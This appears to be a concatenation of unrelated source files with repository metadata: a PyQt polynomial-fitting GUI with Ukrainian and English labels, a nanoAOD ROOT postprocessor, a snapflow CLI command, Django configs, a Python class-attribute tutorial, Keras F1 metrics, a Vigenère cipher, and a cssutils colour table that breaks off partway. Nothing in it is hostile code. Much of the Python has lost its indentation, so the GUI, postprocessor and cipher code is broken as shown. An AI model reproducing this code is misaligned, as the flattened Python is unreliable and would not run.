QtCore.QObject.connect(self.gobutton, QtCore.SIGNAL("clicked()"), self.start)
methodlayout = QtGui.QVBoxLayout()
methodlayout.addWidget(self.polinombox)
methodlayout.addWidget(self.lambdabox)
methodlayout.addWidget(self.gobutton)
for i in range(4):
methodlayout.addWidget(QtGui.QLabel(""))
graphicmethodlayout = QtGui.QHBoxLayout()
graphicmethodlayout.addLayout(methodlayout)
graphicmethodlayout.addWidget(self.graphicbox)
mainlayout = QtGui.QVBoxLayout()
mainlayout.addLayout(langwinlayout)
mainlayout.addWidget(self.inputbox)
mainlayout.addLayout(graphicmethodlayout)
self.setLayout(mainlayout)
def selectInputFile(self):
path = str(QtGui.QFileDialog.getOpenFileName(None, "Виберіть файл з вхідними даними", QtCore.QDir.currentPath(), "All (*);;Images (*.png *.jpg)"))
if len(path)>0:
self.filename[0].setText(path)
def selectOutputFile(self):
path = str(QtGui.QFileDialog.getOpenFileName(None, "Виберіть файл для вихідних даних", QtCore.QDir.currentPath(), "All (*);;Images (*.png *.jpg)"))
if not path == []:
self.filename[1].setText(path)
def LangChange(self):
##print("LangChanged")
now = self.langwin.currentIndex()
if now == 1:
self.setWindowTitle("Functional dependency resoration")
self.vectorbox.setTitle("Input vectors dimentions")
self.polinombox.setTitle("Polinoms setting")
self.inputbox.setTitle("Input and output data")
self.lambdabox.setTitle("λ Search")
self.graphicbox.setTitle("Graphics")
self.polinomdegreebox.setTitle("Polinom degrees")
self.langlab.setText("Language")
self.filelables[0].setText("Input data file")
self.filelables[1].setText("Results file")
for i in range(2):
self.filebuttons[i].setText("Select")
self.samlable.setText("Sample size")
self.polinomlab.setText("Polinoms of")
self.buttonsys1.setText("with 1 system")
self.buttonsys3.setText("with 3 systems")
self.gobutton.setText("Solve")
for graphic in self.graphics:
graphic.zoombut.setText("Zoom")
graphic.panbut.setText("Pan")
graphic.homebut.setText("Home")
graphic.savebut.setText("Save")
self.polinomtype.clear()
self.polinomtype.addItems(["Chebyshev", "Legendre", "Lagger", "Hermit"])
if now == 0:
self.setWindowTitle("Відновлення функціональної залежності")
self.vectorbox.setTitle("Розмірності вхідних векторів")
self.polinombox.setTitle("Поліноми")
self.inputbox.setTitle("Вхідні та вихідні дані")
self.lambdabox.setTitle("Пошук λ")
self.graphicbox.setTitle("Графіки")
self.polinomdegreebox.setTitle("Степені поліномів")
self.langlab.setText("Мова")
self.filelables[0].setText("Файл вхідних даних")
self.filelables[1].setText("Файл результатів")
for i in range(2):
self.filebuttons[i].setText("Обрати")
self.samlable.setText("Обсяг вибірки")
self.polinomlab.setText("Задання поліномів")
self.buttonsys1.setText("за 1єю системою")
self.buttonsys3.setText("за 3ма системами")
self.gobutton.setText("Розв'язати")
for graphic in self.graphics:
graphic.zoombut.setText("Збільшити")
graphic.panbut.setText("Перемістити")
graphic.homebut.setText("Повністю")
graphic.savebut.setText("Зберегти")
self.polinomtype.clear()
self.polinomtype.addItems(["Чебишева", "Лежандра", "Лаггера", "Ерміта"])
def start(self):
for widget in self.graphics:
widget.hide()
widget.destroy()
self.graphicstab.clear()
dimensions = [self.dimensions[i].value() for i in range(3)]
degrees = [self.polinomdegree[i].value() for i in range(3)]
if (self.lambdamethod[0].isChecked()):
lambda_flag = 0
else:
lambda_flag = 1
mod = Iterator(self.samplevolume.value(), dimensions, self.dimensions[3].value(), self.filename[0].text(), self.polinomtype.currentIndex(), degrees, lambda_flag)
mod.normalization()
n_array = np.arange(float(self.samplevolume.value()))
ydim = self.dimensions[3].value()
for i in range(ydim):
self.graphics.append(PlotManager(self))
self.graphicstab.addTab(self.graphics[i], 'Y'+str(i))
for i in range(ydim):
self.graphics.append(PlotManager(self))
self.graphicstab.addTab(self.graphics[ydim+i], 'res'+str(i))
mod.approximate(self.filename[1].text())
mod.denormalization()
for i in range(ydim):
self.graphics[i].ax.clear()
self.graphics[i].ax.set_facecolor('#dddddd')
self.graphics[i].ax.plot(n_array, mod.y[i], 'b', n_array, mod.y_cnt[i], '#D53206') ##0707FA082A6A
self.graphics[i].canvas.draw()
for i in range(ydim):
resid = (mod.y[i] - mod.y_cnt[i])/max(mod.y[i])
for j in range(len(resid)):
resid[j] = np.fabs(resid[j])
print(mod.y[i], mod.y_cnt[i], resid)
self.graphics[ydim+i].ax.clear()
self.graphics[ydim+i].ax.set_facecolor('#dddddd')
self.graphics[ydim+i].ax.plot(n_array, resid, '#0D6806')
self.graphics[ydim+i].canvas.draw()
app = QtGui.QApplication(sys.argv)
window = mainWindow()
window.show()
sys.exit(app.exec_())
|
[
"noreply@github.com"
] |
noreply@github.com
|
a87bf5f31c6025305ca0fd7c72b461abad7671a5
|
b2075a92c3854c921a95673a3c5ebb424ab08112
|
/python/postprocessing/framework/postprocessor.py
|
9eb1775d8dbd0f52159a9b31d8202b7f33272466
|
[] |
no_license
|
vhbb/nanoAOD-tools
|
cd2a6305991369948bb9577c5da3c7e4db275c52
|
14bce3dca68288e65b2daefce755d65914a3765d
|
refs/heads/master
| 2021-09-04T21:44:29.892241
| 2018-01-22T12:50:50
| 2018-01-22T12:50:50
| 106,291,673
| 1
| 1
| null | 2018-01-22T12:50:51
| 2017-10-09T14:06:47
|
Python
|
UTF-8
|
Python
| false
| false
| 4,843
|
py
|
#!/usr/bin/env python
import os
import time
import ROOT
ROOT.PyConfig.IgnoreCommandLineOptions = True
from PhysicsTools.NanoAODTools.postprocessing.framework.branchselection import BranchSelection
from PhysicsTools.NanoAODTools.postprocessing.framework.datamodel import InputTree
from PhysicsTools.NanoAODTools.postprocessing.framework.eventloop import eventLoop
from PhysicsTools.NanoAODTools.postprocessing.framework.output import FriendOutput, FullOutput
from PhysicsTools.NanoAODTools.postprocessing.framework.preskimming import preSkim
from PhysicsTools.NanoAODTools.postprocessing.framework.jobreport import JobReport
class PostProcessor :
def __init__(self,outputDir,inputFiles,cut=None,branchsel=None,modules=[],compression="LZMA:9",friend=False,postfix=None,
jsonInput=None,noOut=False,justcount=False,provenance=False,haddFileName=None,fwkJobReport=False):
self.outputDir=outputDir
self.inputFiles=inputFiles
self.cut=cut
self.modules=modules
self.compression=compression
self.postfix=postfix
self.json=jsonInput
self.noOut=noOut
self.friend=friend
self.justcount=justcount
self.provenance=provenance
self.jobReport = JobReport() if fwkJobReport else None
self.haddFileName=haddFileName
if self.jobReport and not self.haddFileName :
print "Because you requested a FJR we assume you want the final hadd. No name specified for the output file, will use tree.root"
self.haddFileName="tree.root"
self.branchsel = BranchSelection(branchsel) if branchsel else None
def run(self) :
if not self.noOut:
outpostfix = self.postfix if self.postfix != None else ("_Friend" if self.friend else "_Skim")
if self.compression != "none":
ROOT.gInterpreter.ProcessLine("#include <Compression.h>")
(algo, level) = self.compression.split(":")
compressionLevel = int(level)
if algo == "LZMA": compressionAlgo = ROOT.ROOT.kLZMA
elif algo == "ZLIB": compressionAlgo = ROOT.ROOT.kZLIB
else: raise RuntimeError("Unsupported compression %s" % algo)
else:
compressionLevel = 0
print "Will write selected trees to "+self.outputDir
if not self.justcount:
if not os.path.exists(self.outputDir):
os.system("mkdir -p "+self.outputDir)
if self.noOut:
if len(self.modules) == 0:
raise RuntimeError("Running with --noout and no modules does nothing!")
for m in self.modules: m.beginJob()
fullClone = (len(self.modules) == 0)
outFileNames=[]
t0 = time.clock()
totEntriesRead=0
for fname in self.inputFiles:
# open input file
inFile = ROOT.TFile.Open(fname)
#get input tree
inTree = inFile.Get("Events")
totEntriesRead+=inTree.GetEntries()
# pre-skimming
elist,jsonFilter = preSkim(inTree, self.json, self.cut)
if self.justcount:
print 'Would select %d entries from %s'%(elist.GetN() if elist else inTree.GetEntries(), fname)
continue
else:
print 'Pre-select %d entries out of %s '%(elist.GetN() if elist else inTree.GetEntries(),inTree.GetEntries())
if fullClone:
# no need of a reader (no event loop), but set up the elist if available
if elist: inTree.SetEntryList(elist)
else:
# initialize reader
inTree = InputTree(inTree, elist)
# prepare output file
outFileName = os.path.join(self.outputDir, os.path.basename(fname).replace(".root",outpostfix+".root"))
outFile = ROOT.TFile.Open(outFileName, "RECREATE", "", compressionLevel)
outFileNames.append(outFileName)
if compressionLevel: outFile.SetCompressionAlgorithm(compressionAlgo)
# prepare output tree
if self.friend:
outTree = FriendOutput(inFile, inTree, outFile)
else:
outTree = FullOutput(inFile, inTree, outFile, branchSelection = self.branchsel, fullClone = fullClone, jsonFilter = jsonFilter,provenance=self.provenance)
# process events, if needed
if not fullClone:
(nall, npass, timeLoop) = eventLoop(self.modules, inFile, outFile, inTree, outTree)
print 'Processed %d preselected entries from %s (%s entries). Finally selected %d entries' % (nall, fname, inTree.GetEntries(), npass)
else:
print 'Selected %d entries from %s' % (outTree.tree().GetEntries(), fname)
# now write the output
outTree.write()
outFile.Close()
print "Done %s" % outFileName
if self.jobReport:
self.jobReport.addInputFile(fname,nall)
for m in self.modules: m.endJob()
print totEntriesRead/(time.clock()-t0), "Hz"
if self.haddFileName :
os.system("./haddnano.py %s %s" %(self.haddFileName," ".join(outFileNames))) #FIXME: remove "./" once haddnano.py is distributed with cms releases
if self.jobReport :
self.jobReport.addOutputFile(self.haddFileName)
self.jobReport.save()
|
[
"andrea.rizzi@cern.ch"
] |
andrea.rizzi@cern.ch
|
d8df3e108eb2a60fcac671fff7ece2212a4fd8a5
|
f0e11aeb7b5bd96c828cf39728eb2fa523f320df
|
/snapflow/cli/commands/generate.py
|
10a6882c60f47d5c9c2a9a96f8435d9b031bb621
|
[
"BSD-3-Clause"
] |
permissive
|
sathya-reddy-m/snapflow
|
7bc1fa7de7fd93b81e5b0538ba73ca68e9e109db
|
9e9e73f0d5a3d6b92f528ef1e2840ad92582502e
|
refs/heads/master
| 2023-05-01T05:14:08.479073
| 2021-05-21T00:14:56
| 2021-05-21T00:14:56
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,840
|
py
|
from __future__ import annotations
import os
from snapflow.cli.commands.base import SnapflowCommandBase
import sys
from contextlib import contextmanager
from importlib import import_module
from pathlib import Path
from types import ModuleType
from typing import List, Pattern
from cleo import Command
from snapflow.core.declarative.dataspace import DataspaceCfg
from snapflow.templates.generator import generate_template, insert_into_file
def strip_snapflow(s: str) -> str:
if s.startswith("snapflow_"):
return s[9:]
return s
class GenerateCommand(SnapflowCommandBase, Command):
    """
    Generate new snapflow component

    new
        {type : Type of component to generate (module, dataspace, function, schema, or flow)}
        {name : name of the component }
        {--s|namespace : namespace of the component, defaults to current module namespace }
    """
    # NOTE: the docstring above is parsed by cleo as the CLI command spec
    # (command name, arguments, options) -- do not reword it.

    def handle(self):
        # Entry point: read CLI args and dispatch to handle_<type>(name, namespace).
        # self.import_current_snapflow_module()
        type_ = self.argument("type")
        name = self.argument("name")
        namespace = self.option("namespace")
        try:
            # Dynamic dispatch to one of the handle_* methods below.
            # NOTE(review): this except also masks AttributeErrors raised
            # *inside* a handler; consider resolving the attribute first.
            getattr(self, f"handle_{type_}")(name, namespace)
        except AttributeError:
            raise ValueError(
                f"Invalid type {type_}, must be one of (module, dataspace, flow, function, schema)"
            )

    def handle_module(self, name: str, namespace: str):
        # Module namespace defaults to the module name itself.
        namespace = namespace or name
        generate_template(
            "module", namespace=namespace, name=name,
        )
        # generate_template("tests", py_module_name=py_module_name, module_name=name)

    def handle_dataspace(self, name: str, namespace: str):
        # NOTE(review): overwrites `name` with `namespace` when --namespace is
        # given (cf. handle_module, which assigns `namespace` instead) --
        # confirm this is intentional.
        name = namespace or name
        generate_template(
            "dataspace", name=name,
        )
        # Move single file back down to root (cookiecutter doesn't support)
        os.rename(f"{name}/snapflow.yml", "snapflow.yml")

    def handle_function(self, name: str, namespace: str):
        module = self.import_current_snapflow_module()
        # NOTE(review): the `namespace` parameter is ignored here; it is
        # always re-read from the current module -- confirm intended.
        namespace = getattr(module, "namespace", None)
        with self.chdir_relative("functions"):
            generate_template("function", function_name=name, namespace=namespace)
        self.insert_function_into_current_init_file(name)

    def handle_schema(self, name: str, namespace: str):
        namespace = strip_snapflow(namespace or self.get_current_snapflow_module_name())
        with self.chdir_relative("schemas"):
            generate_template("schema", schema_name=name, namespace=namespace)
        self.insert_schema_into_current_init_file(name)

    def handle_flow(self, name: str, namespace: str):
        namespace = strip_snapflow(namespace or self.get_current_snapflow_module_name())
        # NOTE(review): unlike the handlers above, this chdir is not scoped by
        # a context manager, so the working directory stays changed afterwards.
        os.chdir(self.abs_path("flows"))
        generate_template("flow", flow_name=name, namespace=namespace)
|
[
"kenvanharen@gmail.com"
] |
kenvanharen@gmail.com
|
56c0e641146ff1f1664bf1b038aae0946cb7f434
|
6dc12a6426b18e1266639f023cc8d356055aed71
|
/Treadmillwebsite/apps.py
|
f2c9786e1c7982839f5423a66e2f67ec567feaf2
|
[] |
no_license
|
kiranM235/Treadmill-Website-Django
|
6d4e040bed03bfdca06e6fc4c0207dad92c071c2
|
35bb2eb6c19a0b5006f334a761ddfa7c14b4d345
|
refs/heads/master
| 2023-07-06T16:15:27.272961
| 2021-08-17T07:24:20
| 2021-08-17T07:24:20
| 395,590,718
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 164
|
py
|
from django.apps import AppConfig
class TreadmillwebsiteConfig(AppConfig):
    """Django application configuration for the Treadmillwebsite app."""
    # Use 64-bit auto-incrementing primary keys for models in this app.
    default_auto_field = 'django.db.models.BigAutoField'
    name = 'Treadmillwebsite'
|
[
"kiranmaharjan89@gmail.com"
] |
kiranmaharjan89@gmail.com
|
e43cfc6aa1633a9191785d3f556f8d0272598293
|
130d5455b1974710515ba4761d3b6780315725df
|
/core/orm/common.py
|
13e75a0a5dfe391691999bb199f9ad9f1d95f29c
|
[] |
no_license
|
Illicitus/aiohttp-playground
|
f3711af5aa3ddb5bad4f905b7045f4947684ae70
|
d0fdb54b4a35d5714e43f99c6ef1aee3bd37e107
|
refs/heads/main
| 2023-04-03T06:57:01.488181
| 2021-04-11T18:43:04
| 2021-04-11T18:43:04
| 349,416,149
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 79
|
py
|
from pydantic import ValidationError
from core.responses.json import NotFound
|
[
"honchar.vitalii@gmail.com"
] |
honchar.vitalii@gmail.com
|
377d8d2bcde9cc96994429bc34f03d2d7d68a11e
|
1d8ce00008e6f6cbb7f2728ea7e7b9af28b1a7c4
|
/guppe/POO/atributos.py
|
23709c67c5114837d0ea26e7fa497e4c92bae1d8
|
[] |
no_license
|
HigorSenna/python-study
|
05d09e09075dc2eb9c4f790928d68aab0c8a18b5
|
9b1a0c5e487b3cd397f371c7c4648148430e13d9
|
refs/heads/master
| 2022-12-03T00:16:53.075812
| 2020-08-17T15:54:01
| 2020-08-17T15:54:01
| 285,556,390
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,479
|
py
|
"""
Atributos
Em Python, por convenção, ficou estabelecido que todo atributo de uma classe deve ser PUBLICO, caso queira colocar
privado, é so usar __ em sua declaracao
"""
# Classe com atributos privados
class Lampada:
# OBS: Atributos privados: __nome
def __init__(self, voltagem, cor): # Construtor
self.__voltagem = voltagem
self.__cor = cor
self.__ligada = False
@property
def voltagem(self):
return self.__voltagem
@property
def cor(self):
return self.__cor
@property
def ligada(self):
return self.__ligada
class Acesso:
def __init__(self, email, senha):
self.email = email
self.__senha = senha
acesso = Acesso('email@gmail.com', '123456')
print(acesso.email)
# print(acesso.__senha) # AtributeError
# Name Mangling -> conseguimos acessar um atributo mesmo sendo privado (nao recomendado)
print(acesso._Acesso__senha)
# Classe com atributos publicos
class ContaCorrente:
def __init__(self, numero, limite, saldo):
self.numero = numero
self.limite = limite
self.saldo = saldo
# Em python, o primeiro atributo de um método é sempre a referencia do objeto, e como convenção sempre devemos chama-lo
# de self, porém podemos colocar qualquer nome:
class ContaPoupanca:
def __init__(this, numero, limite, saldo):
this.numero = numero
this.limite = limite
this.saldo = saldo
# ATRIBUTOS DE CLASSE (em Java: static)
from random import random
class Produto:
imposto = 1.05 # Atributo de instancia
def __init__(self, nome, valor):
self.id = random()
self.nome = nome
self.valor = (valor * Produto.imposto)
p1 = Produto('PS4', 2300)
print(p1.imposto) # Acesso possivel más incorreto para acesso ao atributo de classe, forma correta:
print(Produto.imposto)
p2 = Produto('PS5', 6000)
# Atributos Dinâmicos (Não comum)
# - É um atributo de instância que pode ser criado em tempo de execução e será exclusivo da instância que o criou
p3 = Produto('Xbox', 2300)
p3.peso = '5Kg' # Note que na classe produto nao existe o atributo peso
print(p3.peso)
# Listando os objetos com seus respectivos valores:
print(p3.__dict__) # Pega os atributos de INSTÂNCIA com seus valores e transforma e retorna um dicionario
# Deletando atributos
del p3.peso
print(p3.__dict__)
del p3.nome
print(p3.__dict__) # Posso deletar qualquer atributo de instância
|
[
"higorrebjfmg@gmail.com"
] |
higorrebjfmg@gmail.com
|
655594a78e371613ede21c222f5abad2afe4b62f
|
907efd02ac6920adac86571f46b89b05644b1e99
|
/apps/courseApp/urls.py
|
094d5c188c9aa63976caa218af96e83c4285d180
|
[] |
no_license
|
RyanGKist/DjangoCourses
|
3f2333fa26dfec5b6fc5492e04f098a26ac1b038
|
877d4f239b930f0089febaffdca870eee325178e
|
refs/heads/master
| 2021-08-14T15:13:42.822507
| 2017-11-16T02:58:13
| 2017-11-16T02:58:13
| 110,915,224
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 238
|
py
|
from django.conf.urls import url
from . import views
# URL routes for the course app.
urlpatterns = [
    url(r'^$' , views.index),                     # landing page / course list
    url(r'^courseAdd$', views.course_create),     # create a new course
    # NOTE(review): similar-looking routes map to different views --
    # 'remove<uid>' -> views.destroy, 'destroy<uid>' -> views.destroy_data;
    # confirm the naming is intentional.
    url(r'^remove(?P<uid>\d+)$', views.destroy),
    url(r'^destroy(?P<uid>\d+)$', views.destroy_data)
]
|
[
"RyanGKistner@Patricks-MacBook-Pro-2.local"
] |
RyanGKistner@Patricks-MacBook-Pro-2.local
|
b8930744c4984b31348d1c800cd832c48d9884c9
|
9a42f514882b7c2ae8e444ef8aa7ff9ed0a33b22
|
/src/metrics.py
|
199d83ebc298db78f56e93abfccd5fa0fea390b3
|
[] |
no_license
|
gusriobr/crop_seq_prediction
|
aa2809d11d73a6c4d278245fd4f5f4444f23139b
|
01721b5ff826322723bc8b5ea0ef696b12dfdb07
|
refs/heads/master
| 2023-01-23T22:21:57.800323
| 2020-12-10T11:21:37
| 2020-12-10T11:21:37
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,047
|
py
|
import tensorflow as tf
import keras.backend as K
def f1(y_true, y_pred):
    """Macro-averaged F1 metric for Keras.

    Predictions are rounded to {0, 1}, per-class true/false positives and
    false negatives are summed over the batch axis (axis=0), and the
    per-class F1 scores are averaged.  ``K.epsilon()`` guards the divisions;
    classes with no support produce NaN and are zeroed before the mean.

    Changes vs. original: removed the unused ``tn`` computation and renamed
    the local that shadowed the function name.
    """
    y_pred = K.round(y_pred)
    tp = K.sum(K.cast(y_true * y_pred, 'float'), axis=0)
    fp = K.sum(K.cast((1 - y_true) * y_pred, 'float'), axis=0)
    fn = K.sum(K.cast(y_true * (1 - y_pred), 'float'), axis=0)

    p = tp / (tp + fp + K.epsilon())
    r = tp / (tp + fn + K.epsilon())

    score = 2 * p * r / (p + r + K.epsilon())
    # 0/0 for classes absent from the batch yields NaN; zero those out.
    score = tf.where(tf.math.is_nan(score), tf.zeros_like(score), score)
    return K.mean(score)
def f1_loss(y_true, y_pred):
    """Soft macro-F1 loss for Keras: ``1 - mean(per-class F1)``.

    Unlike ``f1``, predictions are NOT rounded here, so ``y_pred`` is used as
    soft probabilities -- presumably to keep the loss differentiable (TODO
    confirm intent).  Per-class counts are summed over the batch axis and
    ``K.epsilon()`` guards the divisions.

    Changes vs. original: removed the unused ``tn`` computation and renamed
    the local ``f1`` that shadowed the metric function of that name.
    """
    tp = K.sum(K.cast(y_true * y_pred, 'float'), axis=0)
    fp = K.sum(K.cast((1 - y_true) * y_pred, 'float'), axis=0)
    fn = K.sum(K.cast(y_true * (1 - y_pred), 'float'), axis=0)

    p = tp / (tp + fp + K.epsilon())
    r = tp / (tp + fn + K.epsilon())

    score = 2 * p * r / (p + r + K.epsilon())
    # 0/0 for classes absent from the batch yields NaN; zero those out.
    score = tf.where(tf.math.is_nan(score), tf.zeros_like(score), score)
    return 1 - K.mean(score)
|
[
"gusriobr@gmail.com"
] |
gusriobr@gmail.com
|
b8a72b235685444f3296526d4ae00737b1cc4183
|
cba5017525d30f84f4555bc0e10f1f83126f1d4a
|
/Solar/solarInfo/apps.py
|
2fcdc3f23dfa80d2de63c42f6ff03df6ca0ff227
|
[
"Apache-2.0"
] |
permissive
|
cycmay/SolarS
|
66e97a0de6b459f8bb05b03c2690d9852d92209a
|
284bcafa5da210e5c4200d19e46b3fa6bb5acb20
|
refs/heads/master
| 2020-05-23T18:09:09.760666
| 2019-05-24T15:42:25
| 2019-05-24T15:42:25
| 186,882,616
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 94
|
py
|
from django.apps import AppConfig
class SolarConfig(AppConfig):
    """Django application configuration for the solarInfo app."""
    name = 'solarInfo'
|
[
"1769614470@qq.com"
] |
1769614470@qq.com
|
79ec10a6c2cd2eb5753da2872644f311bf6deecd
|
f752ca1367a85cf4413d1b0b9403976f2e67f7c7
|
/loo.py
|
7f506ae5dced5ff197167f82f637ce2d933bc0cf
|
[] |
no_license
|
raferalston/proverka
|
0cb3da2111fae2e6fc53da06aa7b9c74bb90b70d
|
b28afe8430fee02b3673dffa622cbd9977084fe5
|
refs/heads/main
| 2023-05-14T22:50:13.031900
| 2021-05-21T13:44:27
| 2021-05-21T13:44:27
| 369,549,662
| 0
| 0
| null | 2021-05-21T13:47:26
| 2021-05-21T13:47:26
| null |
UTF-8
|
Python
| false
| false
| 175
|
py
|
i = int(input())
s = int(input())
y = int(input())
def loo(i, s, y):
    """Grow principal *s* by *i* percent compounded over *y* periods.

    Each period applies ``s = i/100 * s + s`` exactly as before.

    Fix: the original ``while y != 0`` decremented ``y`` and therefore looped
    forever for negative ``y``; ``range(y)`` performs zero iterations in that
    case and returns ``s`` unchanged.
    """
    for _ in range(y):
        s = i / 100 * s + s
    return s
print(loo(i, s, y))
|
[
"noreply@github.com"
] |
noreply@github.com
|
765bf9d191e29765530286712a31e9a39e6d6c5b
|
943d7ded0e464e3c3a4475c269eccde305865cf2
|
/natural_language_processing/Lemmatization.py
|
bfa9f27e3706ca4ce2e49bce557898592143df35
|
[] |
no_license
|
markikojr/DataScience
|
ab2d8af362012cf2985ce2c51d618605fd0f9223
|
40e1559ae511dfe8141bbfb17719aea099069b4a
|
refs/heads/master
| 2022-12-14T22:33:06.587191
| 2019-11-25T20:03:27
| 2019-11-25T20:03:27
| 200,712,164
| 1
| 0
| null | 2022-12-08T05:20:21
| 2019-08-05T18:56:22
|
Roff
|
UTF-8
|
Python
| false
| false
| 1,356
|
py
|
'''
This program shows some basics about Lemmatization using spacy library
'''
# Perform standard imports:
import spacy
nlp = spacy.load('en_core_web_sm')
print("---------- Create doc1 and apply tokenization, Part-or-speech tag and lemmatization:", "\n")
# Creating doc1
doc1 = nlp(u"I am a runner running in a race because I love to run since I ran today")
# Apply tokenization, Part-or-speech tag and lemmatization
for token in doc1:
print(token.text, '\t', token.pos_, '\t', token.lemma, '\t', token.lemma_)
print("---------- Define function to apply tokenization, Part-or-speech tag and lemmatization and better display:", "\n")
# Defining function to apply tokenization, Part-or-speech tag and lemmatization and better display
def show_lemmas(text):
    """Print text, coarse POS tag, lemma hash and lemma string per token.

    text: assumed to be a spaCy Doc (iterable of Token objects exposing
    .text/.pos_/.lemma/.lemma_) -- TODO confirm against callers.
    """
    for token in text:
        print(f'{token.text:{12}} {token.pos_:{6}} {token.lemma:<{22}} {token.lemma_}')
print("---------- Create doc2 and apply function:", "\n")
# Create doc2 and apply function
doc2 = nlp(u"I saw eighteen mice today!")
show_lemmas(doc2)
print("---------- Create doc3 and apply function:", "\n")
# Create doc3 and apply function
doc3 = nlp(u"I am meeting him tomorrow at the meeting.")
show_lemmas(doc3)
print("---------- Create doc4 and apply function:", "\n")
# Create doc4 and apply function
doc4 = nlp(u"That's an enormous automobile")
show_lemmas(doc4)
|
[
"marcoscmartinsjr@gmail.com"
] |
marcoscmartinsjr@gmail.com
|
18dec9909a2f079119d67538333ae4ba3f2c8476
|
f3ccbc61c9a968e130536f66ec896393ea2ad463
|
/test/tp.py
|
bed900aab528b53223cc14f5438c94f8c3bb02bc
|
[] |
no_license
|
rutikatuscano22/Folder3
|
69f563cf1ec0fe71242bcaf99e7cefc44b70068d
|
59e5ba5e5c91221625567e629e4daf5601ab97ad
|
refs/heads/main
| 2023-04-16T08:26:36.762625
| 2021-04-28T15:49:41
| 2021-04-28T15:49:41
| 362,525,082
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 14
|
py
|
print('sdf')  # prints a literal placeholder string
|
[
"noreply@github.com"
] |
noreply@github.com
|
b731f7bb0a905cd69ba11d5d934cc0ac33f22050
|
781e2692049e87a4256320c76e82a19be257a05d
|
/all_data/exercism_data/python/simple-cipher/7df478df5b6546c4b554e717f00f4c75.py
|
902cdef37788b91c86d3d3b606190688274c6913
|
[] |
no_license
|
itsolutionscorp/AutoStyle-Clustering
|
54bde86fe6dbad35b568b38cfcb14c5ffaab51b0
|
be0e2f635a7558f56c61bc0b36c6146b01d1e6e6
|
refs/heads/master
| 2020-12-11T07:27:19.291038
| 2016-03-16T03:18:00
| 2016-03-16T03:18:42
| 59,454,921
| 4
| 0
| null | 2016-05-23T05:40:56
| 2016-05-23T05:40:56
| null |
UTF-8
|
Python
| false
| false
| 1,338
|
py
|
'''cipher.py
created 6 Nov 2014
by @jestuber '''
import string
class Caesar(object):
    """Caesar cipher: delegates to Cipher with its default key 'd' (shift 3).

    NOTE: this module uses Python 2-only APIs (string.lowercase,
    str.translate(None, ...)) and will not run under Python 3.
    """
    def __init__(self):
        super(Caesar, self).__init__()
        # self.arg = arg

    def encode(self,plaintext):
        # Delegate to a Cipher built with the default key.
        return Cipher().encode(plaintext)

    def decode(self,encoded):
        return Cipher().decode(encoded)
class Cipher(object):
    """Vigenere-style cipher keyed by a lowercase string.

    Each key letter contributes its alphabet index as a shift; the shifts
    cycle over the key while encoding/decoding.  Input is lowercased and
    stripped of punctuation, digits and spaces first.

    NOTE: Python 2 only -- relies on string.lowercase and
    str.translate(None, deletechars).
    """
    def __init__(self, key='d'):
        super(Cipher, self).__init__()
        self.key = key
        # Per-letter shift amounts derived from the key ('a' -> 0, 'b' -> 1, ...).
        self.shift = [string.lowercase.index(c) for c in key]

    def encode(self,plaintext):
        encoded = []
        # Drop punctuation/digits/spaces and lowercase (Python 2 translate form).
        plaintext = plaintext.translate(None, string.punctuation+string.digits+' ').lower()
        ishift = 0
        for c in plaintext:
            plainkey = string.lowercase.index(c)
            newkey = plainkey + self.shift[ishift]
            # Wrap around the 26-letter alphabet.
            if newkey > 25:
                newkey -= 26
            encoded.append(string.lowercase[newkey])
            # Advance through the key, cycling back to its first letter.
            ishift = 0 if ishift>=len(self.shift)-1 else ishift+1
        return ''.join(encoded)

    def decode(self,encoded):
        plaintext = []
        encoded = encoded.translate(None, string.punctuation+string.digits+' ').lower()
        ishift = 0
        for c in encoded:
            enckey = string.lowercase.index(c)
            # Inverse shift; wrap below 'a' back to the end of the alphabet.
            newkey = enckey - self.shift[ishift]
            if newkey < 0:
                newkey += 26
            plaintext.append(string.lowercase[newkey])
            ishift = 0 if ishift>=len(self.shift)-1 else ishift+1
        return ''.join(plaintext)
|
[
"rrc@berkeley.edu"
] |
rrc@berkeley.edu
|
2e5db24847888b7364737d3edcf63f609a59d47b
|
65c001b5f572a6b0ca09dd9821016d628b745009
|
/frappe-bench/env/lib/python2.7/site-packages/cssutils/css/colors.py
|
0c4e4803b12d140e5337d66ce04c6406d01dfd2f
|
[
"MIT"
] |
permissive
|
ibrahmm22/library-management
|
666dffebdef1333db122c2a4a99286e7c174c518
|
b88a2129a5a2e96ce1f945ec8ba99a0b63b8c506
|
refs/heads/master
| 2022-10-30T17:53:01.238240
| 2020-06-11T18:36:41
| 2020-06-11T18:36:41
| 271,620,992
| 0
| 1
|
MIT
| 2022-10-23T05:04:57
| 2020-06-11T18:36:21
|
CSS
|
UTF-8
|
Python
| false
| false
| 6,669
|
py
|
# -*- coding: utf-8 -*-
"""
Built from something like this:
print [
(
row[2].text_content().strip(),
eval(row[4].text_content().strip())
)
for row in lxml.html.parse('http://www.w3.org/TR/css3-color/')
.xpath("//*[@class='colortable']//tr[position()>1]")
]
by Simon Sapin
"""
# CSS named colors mapped to (r, g, b, alpha) 4-tuples.
# Fix: the original literal listed the 16 basic CSS colors twice (the
# alphabetical extended list repeats them with identical values); the
# redundant first group has been removed.  Resulting dict is unchanged.
COLORS = {
    'transparent': (0, 0, 0, 0.0),
    'aliceblue': (240, 248, 255, 1.0),
    'antiquewhite': (250, 235, 215, 1.0),
    'aqua': (0, 255, 255, 1.0),
    'aquamarine': (127, 255, 212, 1.0),
    'azure': (240, 255, 255, 1.0),
    'beige': (245, 245, 220, 1.0),
    'bisque': (255, 228, 196, 1.0),
    'black': (0, 0, 0, 1.0),
    'blanchedalmond': (255, 235, 205, 1.0),
    'blue': (0, 0, 255, 1.0),
    'blueviolet': (138, 43, 226, 1.0),
    'brown': (165, 42, 42, 1.0),
    'burlywood': (222, 184, 135, 1.0),
    'cadetblue': (95, 158, 160, 1.0),
    'chartreuse': (127, 255, 0, 1.0),
    'chocolate': (210, 105, 30, 1.0),
    'coral': (255, 127, 80, 1.0),
    'cornflowerblue': (100, 149, 237, 1.0),
    'cornsilk': (255, 248, 220, 1.0),
